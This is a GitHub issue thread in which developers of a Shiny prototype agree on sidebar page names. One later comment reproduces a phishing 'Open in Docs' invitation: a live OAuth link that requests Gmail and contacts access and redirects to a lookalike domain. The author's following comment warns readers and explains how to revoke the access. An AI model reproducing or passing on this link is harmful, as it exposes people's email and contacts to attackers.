### ISSUE TITLE
side bar page arrangement

### ISSUE THREAD

**Issue by xhdong-umd** [ctmm-initiative/ctmm-shiny-prototype#6]
Since we are using `Visual Diagnostics` in one page, and we are adding more pages, should we use two words for more of pages? Like this:
- Import Data, this will cover user upload and movebank download
- Visualization, all the plots, outlier detection. I thought about `Visual Inspection` first, but don't want it to be too similar with `Visual Diagnostics`
- Time Subsetting
- Autocorrelation Visualization, this as a drop down menu to several sub pages
  - Variograms
  - Periodograms
- Model Fitting
- Home Range
- Work Report
- Help

**Comment by chfleming** [comment]
Variograms and Periodograms can eventually go under one section titled something like "Autocorrelation visualization". (That section will eventually have a couple more entries too). Model fitting needs to be its own group, I think, because there are complications when you have telemetry error to model, etc..

**Comment by xhdong-umd** [comment]
OK, we definitely will adjust the names with the progress. I edited the first comment a little bit to use `Model fitting` instead of `Modeling`.

**Comment by xhdong-umd** [comment]
Hi Chris,

Did you join the meeting now?

**Comment by xhdong-umd** [comment]
Closing now. Will reopen when there are new changes needed.

**Comment by xhdong-umd** [comment]
Xianghui Dong has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=187102321219-1cb4b2gdr0bqv5u5n35vi1hecjcp1sjg.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.download%2Fg.php&customparam=customparam>

**Comment by xhdong-umd** [comment]
Hi, sorry if you received an email from me "invited you to view the
following document".

This was an email I received from person I known, and once I clicked the
"open in doc" it asked me to allow google doc to access, then if you
allowed it, it will send similar emails to every one in my contact list.

You can revoke the permission in you google account settings, connected
apps & sites, apps that connected to your account. There could be some
google doc in the list.

[image: Inline image 1]

Sorry for the trouble, I should not click it immediately even it was from
human resources.

Best,
Xianghui Dong
